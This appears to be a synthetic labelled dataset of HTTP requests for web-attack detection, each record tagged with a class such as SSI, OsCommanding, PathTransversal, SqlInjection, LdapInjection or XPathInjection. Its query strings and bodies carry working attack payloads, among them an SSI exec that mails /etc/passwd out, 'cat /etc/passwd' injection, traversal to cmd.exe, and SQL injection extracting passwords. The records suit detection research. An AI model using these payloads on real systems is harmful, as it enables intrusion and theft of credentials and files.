~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45553
Start - Id: 40522
class: SSI
GET /7le4io0nrzras/aVtBrsNV/be/v2eni/goo4RhkahyrqzvAkpt7/uf.LT0myuje/qrLih@1BOg-5cKSmR1Ys/iGzsdtizyo3o/SwE5R/eprnd.tiff?Nz1Z.xgPA=8038&vK1E9qm.R-input=hJE&IeersEtamnPF=327&ibroFee=29000&Dstyle5s0dJ5CL71m=98&re5absnue=82&ttiTamu=709&arfepy1lAine=%3Cj&ahs4vcd=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&Asdee=1 HTTP/1.0
Host: 139.19.73.140
Connection: keep-alive
Accept: text/xml;q=0.6
Accept-Charset: windows-1251;q=0.2, x-mac-japanese, shift_jis;q=0.2
Accept-Encoding: *
Accept-Language: bbw-seijs;q=0.2
Cache-Control: max-age=4
Client-ip: 166.14.189.36
Cookie: 9m_d0yNN=tgukjtpFbO6A;39c9wtrolanadsn=1isr;Cee9kro=hTehao~J;iGsb6dD=nTT-;Ev=)awl(;esityM=db8C.tW0A681
Cookie2: $Version="2"
Date: Wed, 25 Aug 04 01:24:03 GMT
ETag: "G5thXp8xs5cDE.veI"
Expect: aqpn=wyer0sy3
From: saz62@4ozorobWl.com
If-Modified-Since: Tue, 25 Sep 07 08:23:03 UTC
If-Unmodified-Since: Thu, 24 May 07 09:01:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.6
Pragma: de=s5hstto
Proxy-Authorization: dler dcyii=syes
Authorization: Basic amM0eDp0dklxb2F0ZQ==
Range: -112429,931-60
Referer: /6lecaro/a9hid/tieh.cfm
TE: deflate;q=0.1,deflate
Trailer: If-Modified-Since
User-Agent: n0gaotrnA/8.1.7.3
UA-CPU: Sparc
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.3 www.ns25.css:3, 5.5 168.218.109.248
Transfer-Encoding: deflate
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 54980742436661257
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40522
Start - Id: 43568
class: OsCommanding
GET /yeeoa/ek/eR8JlwsM9chk/mmO.9k-LbQ1ud8.Ei/lESWVkSDTwtG-g/eWB@61OMlaO8.aspx?3.kOJq6=%3B%7Eicihzdt1psoa4ME&c8ea=7935851645&oe2ngdeiahrsz=c4%293r&uesmtlosptEviil=%7Eq&satxites4Ih=9&Biewnr2slaa=t5GuNLSvd8&f5qUfjX=8noi0fc&udyfngrs=z+&ble5ocpsenoe7=oD5Qp2brWykm&9d=ay&adq=sftfiHlLra+te&LqtbusrhaA=340264&mltnhaaAPt0eler=8125874&bhfle1ctiii=892320&vbTes=%250a++cat++%250a++++%2Fetc%2Fpasswd+++++%250a HTTP/1.1
Host: 189.96.129.152:2077
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: wOo='72seeli'
Client-ip: 198.169.183.255
Cookie: eee1n=shle;lacm79nfwxocic=slsPtztwjmxas5
Cookie2: $Version="9"
Date: Mon, 17 May 04 10:34:50 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Mon, 15 Dec 08 23:30:43 UTC
If-Unmodified-Since: Fri, 09 Oct 09 09:27:29 CET
If-Match: *
If-None-Match: "-bMjkZ7EkGbircmmR0"
If-Range: Thu, 13 Jul 06 22:21:31 UTC
Max-Forwards: 27
MIME-Version: 0.1
Pragma: bs7='ustewDEw'
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: Digest qop=auth
Range: -198504,6676-
Referer: /eftthy/Rifwic/oeAce/ee8uOlp/milee.tiff
TE: deflate,gzip;q=0.2,trailers
Trailer: If-None-Match
User-Agent: p0et (umcvle; dgeX7Byx)
UA-CPU: x86
UA-Disp: 6029,0160,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4547x9829
Via: HTTP/4.9 www.rNon.tiff, rela/2.1 www.eAirsOhn.jpg, 6.0 www.brAtnmta.tiff
Transfer-Encoding: hTkard
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 562 www.w7dtbosr.jpg "TDeee9Afma0tOoes" 
X-Forwarded-For: 123.124.157.36
X-Serial-Number: 244245355
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43568
Start - Id: 45289
class: PathTransversal
GET /KVz/deeddta4o5bnsesgce/hrtes9blqqtt/aa/tuochyaenrrdeeeTs/UeecomHqtge2iodticoh/rZEqMb81VaZFr6S7/xBU/etcWHWHZZhfBTU56Ck/watnerovossnpi/wi/7IDViWrWknetcat@9.mdb? HTTP/1.0
Host: 101.7.109.55
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: ../../../../../../../../../WINNT/autoexec.bat
Accept-Language: eorv-h7lwmE;q=0.6, oiwTt3-iebe, t-smnue
Cache-Control: max-stale=93
Date: Sat, 08 Jul 06 02:31:20 UTC
If-Match: *
If-None-Match: *
If-Range: "hyENtioC0J02xo6XEf"
Max-Forwards: 0154
Pragma: no-cache
Referer: /tloaT1/tsrcsgs/Asgeuds/vwePoto.jsp
TE: trailers,trailers,chunked;q=0.1
User-Agent: ytzhe6uN/6.0.0
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45289
Start - Id: 49504
class: XPathInjection
GET /tJNBHQMJWla/VJY2Tx/aS@bFbkxp55a.jmLbdWL/-DsnullHYUPyp8A/FXr70SmHA7esB.asp?m6S9emeQlu=Orfdhttps0mdhr%3E&ir4enG=q%3C&6llulueawnaten=aU%40Ofh&v_D_qANP=l9Y1ubPUcrts&ewdtnetretp=knuac1s%40e%5Ba8&m1deoee=eyt0Ej%27+++++or++%28i+%3C+++++count%28tz%2Fchild%3A%3Atext%28%29%29+and++j+%3C+count%28bsaraa%2Fchild%3A%3Acomment%28%29%29++and+k+++%3C++++count%28rt%2Fchild%3A%3A*%29++++%29+or++++%27tuB1Ea%27+%3D++++%27+wihysp%27+++or&eybaue2cHhaaCc=raghie&e2cKE=4&Gttpltlprsiah=reuojrqybeeJ&hihzgoare6oe7r=rr6i HTTP/1.0
Host: www.rar7.be
Connection: keep-alive
Accept: video/mpeg, text/plain, application/*;q=0.2
Accept-Charset: gb2312;q=0.3
Accept-Encoding: 
Accept-Language: oHsTttrq-er2;q=0.3
Cache-Control: no-store
Client-ip: 95.13.200.201
Cookie: NTp5pchildgax1M=uyscriptnnnl y
Cookie2: $Version="61"
Date: Tue, 24 Feb 09 04:16:49 UTC
ETag: W/"r2AbaBUZcYbH-sHcVU8"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Fri, 16 Mar 07 17:31:20 CET
If-Unmodified-Since: Thu, 13 Jul 06 12:54:31 UTC
If-Match: *
If-None-Match: *
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 32
MIME-Version: 3.5
Pragma: js='e0gc'
Proxy-Authorization: Basic aGQ4dWVuOmlFYXM=
Authorization: ieer sfiotoe=ytcS
Range: 2-801463,7709-,5-5829
Referer: http://orlteT.org/oge1oe/hexd1/emeti.rar
TE: trailers
Trailer: If-None-Match
User-Agent: tyNoh1stettheE
UA-CPU: StrongARM
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 6.0 85.76.100.119:67
Transfer-Encoding: dhce; idx1biho=ietT5Dtt
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 063 21.35.61.71 "elaoim3oti" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49504
Start - Id: 40112
class: SSI
GET /QEa4Y-E@copyMj/nDnqUNk/0@/inain7tnAflEEapeaSi/sK/aX/uj8tJr@sSsdEgxa/hmiemasoegvoht/1neewt5bwiwqTAzekA3/ljs9Ds@2BKAI.cgi?LqV1=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail+De.com++%3C++%2Fetc%2Fpasswd%22--%3E&Ni4atla=uedG96Z.8fNx HTTP/1.0
Host: 26.119.126.64
Connection: esmfsor
Accept: audio/basic;q=0.4, text/*;q=0.2, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: i9eiGAb=nr4iuel
Client-ip: 69.245.82.199
Cookie: jsbOsntiNfl=ehljhsysc;lw=95;1mAww=4993563;htneenDeE=2t;dtaNamamd7=6473
Cookie2: $Version="7"
Date: Fri, 25 Sep 09 04:47:56 CET
ETag: "DP7vfr99_OjKSyo"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Sun, 16 Jul 06 23:40:26 UTC
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: "Vh_63pD2v1mh9G1d"
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: Sat, 17 Dec 05 20:19:29 UTC
Max-Forwards: 7843
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpbzJwOmh0cjI=
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: /hy5w.png
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 8.5; dn-ne; rv:1.5.7) Gecko/34919939
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7286x8366
Via: 3.9 238.176.162.116, FTP/7.3 www.eegmcn.htm
Transfer-Encoding: identity
Upgrade: 9noias/3.8, wsg/8.7
Warning: 805 www.ithet.png:8 "EIrr" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40112
Start - Id: 37619
class: LdapInjection
POST /ted7omeSuwaersehext/oMfeNeer/n4v1Xtm.js? HTTP/1.1
Content-Length: 128
Content-Language: eem
Content-Encoding: deflate
Content-Location: http://www.vwio.gov/yieer/8lkeahel.php
Content-MD5: c3Q2ZDE5Y29zeGhzYml1bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 06:40:26 GMT
Last-Modified: Mon, 09 Nov 09 22:55:35 GMT
Host: www.t1iV2g.cz
Connection: hldoOrc
Accept: audio/*, text/*;q=0.3
Accept-Charset: cp-950;q=0.7, x-mac-hebrew;q=0.7
Accept-Encoding: *
Accept-Language: glcqa-Es7ehas, rotrmd6-s
Cache-Control: no-transform
Client-ip: 109.56.227.8
Cookie: 3t7Mt3YH10r=b>rcTm;relnIls=sqY_iqYDVz;eoinitpve=720;anaeleeo=i4f33XdAir;cp5M=80548;rdteEet0orLh=2352477
Cookie2: $Version="0"
Date: Sat, 21 Mar 09 06:16:38 CET
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Sat, 01 Jan 05 23:54:39 GMT
If-Unmodified-Since: Wed, 20 Apr 05 23:58:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 448
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: eitoa qsndch=4oxhdl
Range: 249-95
Referer: /tsnez/uohmu3n/noiroh2/naeTwp.jpg
TE: deflate;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: e_TOzC0 http://www.jccf7.gov
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 770x317
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iee=)    (  | (qv=dnt*)&RVpV=C&eNcdUaso=2pE>&lrtao=access_logi|&igdioetrm=0bn'xAtntt6&bNnotnIoioTtSis=deeps6oq

End - Id: 37619
Start - Id: 39344
class: SSI
GET /3ensbheiiF4ryeerr/rdttepttrT/d6p9PQA4l/ltdUion9e/l0dWQs9YVVpJzd/1eoMljEssie3z.htm?sltx7rd=%3C%21--%23email+fromhost%3D%22www.xcmtusr.com%22+tohost%3D%22mailbox.sOi.com%22+message%3D%22esal+ds8latt+ae3+ssn%22+fromaddress%3D%221a8l.com%22+toaddress%3D%22oiruf.n4e.com%22+subject%3D%22dS%22+sender%3D%22yarn.com%22+replyto%3D%22E4raut4.com%22+cc%3D%22T114%22+inreplyto%3D%22lcr+Ovri+Dcyni%22+id%3D%22lzromail%22+--%3E&4eUho=hpmm&iejadcaqtoso3i=ucqrqdgd&pnpoB=8881942401&7CaahtomnENrhu=7psepTOfhNE&bE=bfRYY8duf&lseey=iena&it7Sngetdgo2mu=on%7E%28%2Fatd%3Ccinsertr%7E&sAXILKps7O=3696&I6rseo1Fpc=rieoyhavingn&orOCvapwrmidooo=304&evc0a=ot+Xo&uuvvnn=+5pieetsbetweenldN HTTP/1.1
Host: www.dhiOet.net
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 153.213.53.71
Cookie: n0icedpnNau=883;rmmehavingPJ5Ngroup by=etjhgdA
Cookie2: $Version="74"
Date: Sun, 25 Feb 07 12:04:16 UTC
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: ztifisTh@itMb.uk
If-Modified-Since: Tue, 08 Sep 09 15:41:51 GMT
If-Unmodified-Since: Thu, 09 Apr 09 20:21:19 GMT
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: *
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 7075
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic c2FJYmV5OmV3dGZiNA==
Range: 80-3,5062-096637
Referer: /h82nn1.avi
TE: trailers,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: rmele5a
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5277x2991
Via: pol1et/3.2 208.247.58.3, tgeld/5.6 26.150.182.93:087
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 29.96.81.249
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39344
Start - Id: 35164
class: SqlInjection
PUT /dMeltFn0RDv@m/CX2gfLC9htpassDz/VEfromEUvAbetween/4gbseY/aoYwmtter/nmRnICshijs6say.tiff? HTTP/1.1
Content-Length: 43
Content-Language: ohthlzit,yn
Content-Encoding: compress
Content-Location: http://www.si3L.it/t9ti/tsoawo.css
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Jan 10 16:50:03 GMT
Host: www.1xetrs.de
Connection: keep-alive
Accept: audio/*, image/*;q=0.9
Accept-Encoding: 
Date: Sun, 23 Sep 07 22:49:37 CET
ETag: "tiIa_ocGlz@xaTmTt7pO"
If-None-Match: *
Pragma: no-cache
Authorization: Digest uri=http://aryiney7.de/xeachiru.wav
Referer: /eyaelhqo.mpeg
User-Agent: edhlammr/1.4.7.5.1
Transfer-Encoding: o7sgn; 3ssb6e=nD8as4aa

flaCemgt=select  et0w7tw    from  ALL_USERS

End - Id: 35164
Start - Id: 44373
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 189.13.95.2
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=84680
Client-ip: 90.164.80.82
Cookie: ramlereKTmeniIa=43417
Cookie2: $Version="5"
Date: Tue, 25 Mar 08 17:45:59 CET
ETag: W/"o4@mSRlI7dOqkgmEd"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 07 Dec 06 16:09:40 GMT
If-Unmodified-Since: Sat, 01 Dec 07 03:58:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest qop=auth
Range: -592489
Referer: http://www.oh1ejuM.it/ergtn/uxdmc/haGtdn/toim/lono.js
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (X11; U; SunOS sun4u 2.9; aL-ea; rv:8.1.8) Gecko/10839565
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: 7.9 250.47.236.46, 7.8 81.98.182.25:8733
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44373
Start - Id: 49096
class: XPathInjection
GET /hdK3DiKJ5dCkb/g3owt/Sftheh8trs/DmailW@qOKD/tUl/a.Wl.oZgVR1wcf0lY/yeLPJMhP/selectuyGe2Kz_IG2c.jpeg?Ahadg=yTVj&vH6choah=n%3En%24madminWu%5D&B_hbgsoundVTsV_Io=%5Bho%3D+&tsna=46672&pr=3&iSle8th=4985&cspOok3=ePUMNUcgz6l&.ncdWU-5=ysescmfnufiZtiuLee&vfFMxmDCAzKN=%28&esoet4sa5=tBy1Ta%27++++or++++5ik%2FZ%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D904%5D+++or+++++%27nIs3vBnh%27+++%3D++%27&bniipn9glv=tr&n51oxoh9rxDfeNd=drIUAB6i&oxtbaiqle=opt%25epTmsna1ai&hnnre=iDek&_CgW=hta1aq71nsKdtea HTTP/1.0
Host: 124.147.130.75
Connection: keep-alive
Accept: application/*;q=0.7, application/*
Accept-Charset: iso-10646-ucs-2;q=0.1, hz-gb-2312, x-mac-arabic, windows-1252;q=0.9, x-mac-chinesetrad;q=0.0
Accept-Encoding: compress;q=0.1, deflate
Accept-Language: eToW-yObwl;q=0.3, w2-nsaa4rs7;q=0.2, D4it-etrc4t, OUaw2gam-nf;q=0.4, l4tra-ns7knOny;q=0.5
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="212"
Date: Sat, 29 Mar 08 02:10:44 UTC
ETag: W/"RJ4LQ1xuFMWfEwkbYGU4"
Expect: 100-continue
From: oayjh@w9ulna6.biz
If-Modified-Since: Mon, 15 May 06 01:24:20 CET
If-Unmodified-Since: Sat, 06 Nov 04 23:42:54 GMT
If-Match: "C4MbCYCfY54wx-My6eCe"
If-None-Match: "YVW6aYEA78kymeS"
If-Range: Sun, 18 Jan 09 01:02:49 CET
Max-Forwards: 61
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: http://rneupc.cz/to6xIah.jpg
TE: trailers,trailers
Trailer: Referer
User-Agent: tac5N38-G http://www.4iTttu2.st
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: gzip
Upgrade: aau/4.8
Warning: 835 138.65.160.104 "Deeungnqc1e8n" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49096
Start - Id: 44182
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: www.iacrhuZcge.biz
Connection: close
Accept: image/*;q=0.7, application/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: xi='ahtxep6m'
Client-ip: 163.193.116.46
Cookie: er6=uas;Me=eF:d;arOIUred=Awindow.openo+?el
Cookie2: $Version="67"
Date: Sun, 24 Dec 06 12:36:57 UTC
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 14 Sep 05 11:17:45 GMT
If-Unmodified-Since: Mon, 27 Aug 07 01:54:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 4.3
Pragma: t=yhm3t
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest opaque="Henvik"
Range: 5-,-97,-5
Referer: http://rlne.org/s3m0/oPyi/d5aleeta.htm
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.1 (Windows; U; WinNT 1.7; ep-sx; rv:1.8.5) Gecko/22732103
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: HTTP/6.8 www.oeAoDdn.jpg, 2.5 97.136.49.86
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44182
Start - Id: 44533
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 251.37.133.255
Connection: 65baI
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.9, x-mac-roman, utf-7, utf-8;q=0.2, big5
Accept-Encoding: *;q=0.9
Accept-Language: a-oXtt3t;q=0.5, tx1se-rssie, Rjw-ds, g2qiiym-ealno;q=0.8
Cache-Control: o5r=eimeL
Client-ip: 106.174.171.250
Cookie: e63im0en=6
Cookie2: $Version="79"
Date: Sun, 19 Nov 06 13:30:43 UTC
ETag: W/"5wo8GtlINXLRQtwrv"
Expect: swso=vdlpOs
If-Modified-Since: Mon, 01 Nov 04 15:03:45 GMT
If-Unmodified-Since: Sun, 09 Jul 06 05:04:49 GMT
If-Match: *
If-None-Match: "ZBaC@EA2nBCb@.gpc5s_"
If-Range: *
Max-Forwards: 977
Pragma: ao=wna
Proxy-Authorization: wOenhg wikc=uN2atn
Authorization: ertp 4ZbohOh=ntonn
Range: 30684-
Referer: http://iosyoEao.fr/ohitn0im.jpg
TE: trailers
Trailer: TE
User-Agent: rcuahna
UA-CPU: 68000
UA-Disp: 692,7147,32
Via: 2.3 www.ari3lDE.tiff:31
Transfer-Encoding: identity
X-Forwarded-For: 49.170.176.68

null

End - Id: 44533
Start - Id: 39122
class: LdapInjection
PUT /O3nal6i1.gif? HTTP/1.1
Content-Length: 191
Content-Language: etio,XevttIh
Content-Encoding: gzip
Content-Location: http://www.ono8texd.st/rraeFq/aaoel/NLtrei.swf
Content-MD5: MU5ldDhuM2VhdWlodG5jYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Jul 09 03:56:23 CET
Last-Modified: Sat, 07 Mar 09 05:45:55 UTC
Host: 105.135.83.100
Connection: td8Oa2a9
Accept: text/plain;q=0.6, text/plain;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.3, compress, gzip;q=0.6
Accept-Language: *;q=0.4
Cache-Control: iabon8='ayotxelz'
Client-ip: 58.102.173.136
Cookie: awnreNHqBt7lT4t=9mibreitgstl3nlEn;mg=0;tdneis=To;twoir=lreYpJ;eoiLnEso6rn=)  (  |(2efg=sht*)
Date: Tue, 06 Sep 05 05:23:40 UTC
ETag: "w0b9ghnA4RJ3qFmdT"
If-Unmodified-Since: Fri, 14 Oct 05 24:00:06 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Mar 04 06:55:57 GMT
Max-Forwards: 68
Pragma: mt=dj
Proxy-Authorization: i7tdm traeint=ncrlar
Authorization: Basic cDA1c2U6NU5vODNl
Range: 18-
Referer: /ctztl/tespa/iPnoltm.pl
TE: trailers
User-Agent: opc4itUopjaO8yna
UA-Pixels: 6666x3382
Transfer-Encoding: nxsesc
Upgrade: utraU/8.6, 07oswn/3.9, thkodf/2.0, 1lpi/5.9
X-Forwarded-For: 172.141.49.245
X-Serial-Number: 3871696

aoszhpciwknbaA=nIolmvarthaeora&S6ovDEiUoro53wn=Wvoare0&DGHO=Ceatd&jyrrsa5nHws8=kSAo&em=6658&vbscriptK9M=1330&nueom=SoefadaIwA&ZtC_Y=kitrd5&NlzF=5134725&oeoe=rxj@r6e&CThtcnieNoip=lbB7Wd&rj=7

End - Id: 39122
Start - Id: 37808
class: LdapInjection
GET /kUN4m.html?she3dsohysrasoo=nteu%26Blog%3E%24ewuH%28%25&reln1eaztmddbn=7&eFeesc=1&mihnt=+xenr&Dnthiadlss=itae%29%28++%7C%28eOeo%3D*%29&ornM=uUuxcDWZbO HTTP/1.1
Host: 118.203.25.155
Connection: ys5oedia
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 148.220.0.143
Cookie: gospa=77696541;oi1rnO6s=pet31lNiuitfnf;7LnS9nodleaaaac=11769846;i6rEevlBvhee=3naperltbodyhconnecthsSnnullestdinelsf;5uwtar=rL2FU-3brCk;2-J6=h6OvoHTcv-07
Cookie2: $Version="55"
Date: Fri, 27 Feb 04 03:41:52 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: B0ct=to3ne
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 23 Apr 09 17:17:29 GMT
If-Match: "Zb0wf2BeHixBzcF"
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic dDFsUjp4aGVpdA==
Range: -1,56487-
Referer: /wj1v/heeP/oniriAPw.png
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 4.0; is-be; rv:0.4.0) Gecko/35976631
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/9.1 www.74qads5.css
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37808
Start - Id: 41702
class: SqlInjection
GET /lhlRiDxr1T/ehotkmt/soa/TiroEauunNtt6/hesGihhegal6rnthan/en04tJs_z/en.gif?omb=%27%3B+begin+declare+%40ret++++varchar%288000%29+++set+%40ret%3D%27%3A%27+++select++%40ret%3D%40ret%2B%27++%27%2Bhpw6hhm%2B%27%2F%27%2Bpassword+++++from++++ieaofvrt+where++mi99etd%3E%40ret+++select++++%40ret+++as+++ret+into++foo++++end--&evaWts=truservicesp&5mdfynsshnOic=1 HTTP/1.0
Host: 115.147.189.243
Connection: keep-alive
Accept: video/mpeg;q=0.0, text/html, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: min-fresh=3700
Client-ip: 51.187.24.113
Cookie: nertqsnn=648422;mdsiaeoeeyuDid=lc3;FI3xstyleUMsock_streamd= Reo8
Cookie2: $Version="1"
Date: Thu, 12 May 05 12:23:56 CET
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Mon, 05 Apr 04 22:02:28 CET
If-Match: "msN5PVFwMXvA_pA_3x"
If-None-Match: *
If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 650
MIME-Version: 5.8
Pragma: 3aiyoP8='0nai'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bnBzMm90RTlhaTJ0dmhvaHJpZTE3OHJhaW5lbmVkYTBTYW90ZXdhbw==
Range: 864538-4,42725-309719
Referer: /ee7nczn/ssce6i/eurhfet/ohrlfmrh.php4
TE: gzip;q=0.8
Trailer: Trailer
